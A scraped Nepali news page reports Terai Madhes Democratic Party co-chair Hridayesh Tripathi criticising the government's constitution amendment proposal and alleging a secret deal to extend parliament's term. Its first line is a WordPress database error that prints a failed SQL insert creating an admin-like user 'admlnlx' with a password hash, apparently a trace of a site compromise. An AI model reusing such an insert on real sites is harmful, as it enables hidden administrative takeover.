WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B55XHNVLnWKGJTmwH.bt3kbUzvdRVv1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:52:45', '', 'admlnlx', 'admlnlx')
वीरगन्ज,मंसिर १६-
तराई मधेस लोकतान्त्रिक पार्टीका सह–अध्यक्ष हृदेश त्रिपाठीले सरकारले संसदमा दर्ता गराएको संविधान संशोधनको सात बुँदे प्रस्ताव अधुरो र अपुरो रहेको आरोप लगाएका छन्।
वीरगन्जमा बिहीबार बिहान आयोजित पत्रकार सम्मेलनमा सहअध्यक्ष त्रिपाठीले संशोधन प्रस्ताव अधुरो र अपुरो रहेकाले मधेसी मोर्चालाई यथास्थितिमा प्रस्ताव स्वीकार्य नभएको स्पष्ट पारे। विगतमा काँग्रेस र एमालेले गरेको सहमति अनुसार नै सरकारले अहिले संसदमा संशोधन प्रस्ताव दर्ता गराएको भन्दै त्रिपाठीले भने,‘केपी ओली नेतृत्वको सरकारका बेला एमाले र काँग्रेसले जुन सहमति गरेका थिए। त्यही सहमति अनुसार नै अहिलेको संशोधन प्रस्ताव संसदमा दर्ता गराइएको छ। अहिले आएर एमालेले राष्ट्रघाती भन्दै यो प्रस्तावको विरोध गर्दा हामीलाइ आश्चर्य लागेको छ।’
सत्तारुढ दल काँग्रेस र नेकपा माओवादी केन्द्रकै नेताहरुले सरकारले संसदमा दर्ता गराएको संशोधन प्रस्तावको विरोध गरिरहेको भन्दै त्रिपाठीले अहिलेको संशोधन प्रस्तावले मधेसीको माग सम्बोधन नहुने पनि जिकिर गरे। तराईमा झापादेखि कञ्चनपुरसम्मका जिल्लामा दुई प्रदेश बनाउनु पर्ने मोर्चाको माग यथावत रहेको भन्दै उनले भने,‘अहिले प्रस्तावित सात प्रदेश मध्ये २ नम्बर बाहेक अरु ६ वटा प्रदेश खस आर्यहरुको बर्चस्व रहने गरी सीमांकन गरिएको छ , यो हामीलाई कदापि स्वीकार्य छैन।’
फरक प्रसंगमा नेता त्रिपाठीले प्रमुख तीन दलले व्यवस्थापिका संसदको म्याद थप्ने गोप्य सहमति गरेको बताए। उनले सत्तारुढ काँग्रेस, नेकमा माओवादी केन्द्र र प्रमुख प्रतिपक्षी नेकपा एमालेले संसदको म्याद एक वर्ष थप्नका लागि गोप्य सहमति गरिसकेको बताए।